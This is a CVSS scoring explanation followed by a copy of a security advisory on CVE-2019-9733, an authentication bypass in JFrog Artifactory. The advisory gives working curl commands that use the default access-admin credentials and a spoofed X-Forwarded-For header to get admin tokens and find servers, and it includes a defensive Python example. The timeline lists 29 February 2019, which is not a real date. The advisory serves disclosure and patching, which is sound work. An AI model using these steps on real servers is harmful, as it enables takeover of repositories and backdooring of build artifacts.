The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): None
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction (UI): None
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system; a locally authenticated attacker executes code to elevate privileges.
Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality (C): High
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: JFrog Artifactory Administrator Authentication Bypass
CipherTechs Inc - Security Advisory
JFrog Artifactory Administrator Authentication Bypass
Introduction
============
JFrog Artifactory (https://jfrog.com/artifactory/) is a popular universal artifact repository manager commonly used by software developers. CipherTechs' Red Team discovered a high risk vulnerability that allows unauthenticated remote attackers to obtain administrative access to Artifactory servers and assume control of all stored artifacts and builds.
CVE
====
CVE-2019-9733
Affected Platforms and Versions
===============================
Product: JFrog Artifactory
Version: < 6.8.6
Vulnerability Overview
======================
Security risk: Critical
Attack vector: Remote
Vendor Status: Fixed in version 6.8.6 released March 12, 2019
https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
Vulnerability Description
=========================
Artifactory has an account that can be used to reset the admin account password from localhost.
By providing the HTTP header X-Forwarded-For, it is possible to bypass Artifactory's allowed_ips whitelist.
Accessing the internal "password reset" admin account exposes the primary admin account's access token allowing an attacker to obtain admin access to the Artifactory server without disrupting other users' access.
This vulnerability is exploitable in most configurations including when an external SSO provider such as Okta or Onelogin is used.
Technical details
=================
Artifactory's documentation [1] states that a default account, access-admin, is present and can be used to reset the admin user's password. CipherTechs used curl to check whether the access-admin account was present and had the default password of password.
$ curl -ks -u access-admin:password https://artifactory.lan/artifactory/api/access/api/v1/users/
{
  "errors" : [ {
    "code" : "FORBIDDEN",
    "message" : "User 'access-admin' is not allowed to login from remote address: [IP REDACTED]"
  } ]
}
The error message shows that the credential access-admin:password is valid but is not allowed to log in remotely. CipherTechs bypassed this restriction by sending an X-Forwarded-For HTTP header set to 127.0.0.1 (localhost).
$ curl -ks -H 'X-Forwarded-For: 127.0.0.1' -u access-admin:password https://artifactory.lan/artifactory/api/access/api/v1/users/ | jq .
{
  "users": [
    {
      "username": "access-admin",
      "realm": "internal",
      "status": "enabled",
      "allowed_ips": [
        "127.0.0.1"
      ],
      "created": "2019-01-19T20:00:40.327Z",
      "modified": "2019-02-14T15:55:41.052Z",
      "last_login_time": "1970-01-01T00:00:00.000Z",
      "custom_data": {},
      "password_expired": false,
      "password_last_modified": 1518623741047,
      "groups": []
    },
    {
      "username": "admin",
      "realm": "internal",
      "status": "enabled",
      "allowed_ips": [
        "*"
      ],
      "created": "2019-01-19T20:01:09.806Z",
      "modified": "2019-02-14T15:38:54.481Z",
      "last_login_time": "2019-02-20T11:53:57.973Z",
      "last_login_ip": "[REDACTED]",
      "custom_data": {
        "public_key": "[REDACTED]",
        "updatable_profile": "true",
        "basictoken_shash": "[REDACTED]",
        "private_key": "[REDACTED]",
        "artifactory_admin": "true",
        "basictoken": "[REDACTED]"
      },
      "password_expired": false,
      "password_last_modified": 1518623741101,
      "groups": []
[ CIPHERTECHS: LONG RESPONSE REMOVED FOR BREVITY. All users, keys, and tokens are returned]
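The allowed_ips bypass shown above comes down to a source-address check that believes a client-supplied X-Forwarded-For header. The following added example (not code from the advisory or from Artifactory; the function names, the trusted proxy address and the sample IPs are assumptions) models that flawed check beside a hardened one that honours the header only when the TCP peer is a known reverse proxy.

```python
import ipaddress

# Constructed sample data: the allowlists mirror the "allowed_ips" values
# shown in the response above; the proxy address is a placeholder.
ALLOWED_IPS = {"access-admin": ["127.0.0.1"], "admin": ["*"]}
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.5/32")]


def client_ip_naive(peer_ip, headers):
    """Flawed: believes X-Forwarded-For no matter who sent the request."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip


def _is_trusted_proxy(ip):
    addr = ipaddress.ip_address(ip)  # raises ValueError on malformed input
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip_hardened(peer_ip, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy,
    then walk the chain right to left, skipping trusted hops."""
    if not _is_trusted_proxy(peer_ip):
        return peer_ip
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            if not _is_trusted_proxy(hop):
                return str(ipaddress.ip_address(hop))
        except ValueError:
            return peer_ip  # malformed entry: fall back to the socket peer
    return peer_ip


def login_allowed(user, peer_ip, headers, resolver):
    """Apply the per-user allowlist to whatever address the resolver returns."""
    allowed = ALLOWED_IPS.get(user, [])
    return "*" in allowed or resolver(peer_ip, headers) in allowed
```

With the hardened resolver, a header value of 127.0.0.1 sent directly by a remote client is ignored, and a value prepended ahead of the proxy's own entry is never reached because the chain is read from the right.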
Once authenticated as admin, the full rich Artifactory API was available [2] and yielded sensitive details. For example, the following request retrieves all builds.
$ curl -H"Authorization: Bearer $basictoken_value" -ks https://artifactory.lan/artifactory/api/builds/
The admin account has rights to publish artifacts and can overwrite existing files, making it possible for an attacker to backdoor existing artifacts that current and future builds depend on and giving persistent access across all environments and developer workstations.
Artifactory servers can be discovered by requesting the URI /artifactory/webapp/ and looking for the X-Artifactory-Id HTTP response header.
$ curl -I https://artifactory.lan/artifactory/webapp/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-store,max-age=0
Cache-control: no-cache="set-cookie"
Content-Length: 2239
Content-Type: text/html
Date: Mon, 23 Feb 2019 17:24:08 GMT
ETag: W/"2239-1549437200000"
Last-Modified: Wed, 06 Feb 2019 07:13:20 GMT
Server: Artifactory/6.7.3
X-Artifactory-Id: d9b50a320385a5e306762e0c0a88ad4f6fe1527b
X-Artifactory-Node-Id: artifactory-node-1
X-FRAME-OPTIONS: DENY
Connection: keep-alive
Recommendations
===============
Upgrade to JFrog Artifactory 6.8.6 or higher.
Change the default access-admin password.
Block external access to /api.
Review Artifactory logs for previous API use and any signs of access from unauthorized IP addresses.
Revoke basic tokens for all users. The example command below will revoke the basic token for the access-admin account.
curl -H "Content-Type: application/json+merge-patch" -XPATCH -uaccess-admin --data '{"username":"admin","custom_data":{"basictoken_shash":{"value":"REDACTED","sensitive":false},"basictoken":{"value":"","sensitive":true}}}' https://artifactory.lan/artifactory/api/v1/users/admin
Timeline
=========
2019.02.25 - Vulnerability discovered by CipherTechs
2019.02.28 - JFrog notified
2019.02.29 - JFrog provided interim fix for CipherTechs' client and began working on a patch.
2019.03.12 - Fixed version of Artifactory published at https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
2019.03.21 - Public disclosure
Credits
=======
CipherTechs Red Team
CipherTechs would like to thank JFrog for their professional response to this vulnerability disclosure.
References:
[1] https://www.jfrog.com/confluence/display/RTF/Managing+Users
[2] https://www.jfrog.com/confluence/display/RTF/Artifactory+REST+API
The contents of this advisory are Copyright(c) 2019 CipherTechs Inc.
=====================================================================================
About CipherTechs
CipherTechs is a global Cyber Security service provider founded in 2001 that remains privately held with headquarters in New York City. CipherTechs is exclusively focused on cyber security and provides a full service solution portfolio. We service our customers through the following main practice areas: Offensive Security, Defensive Security, MSSP and SOC, Audit and Compliance, Training and Product Procurement.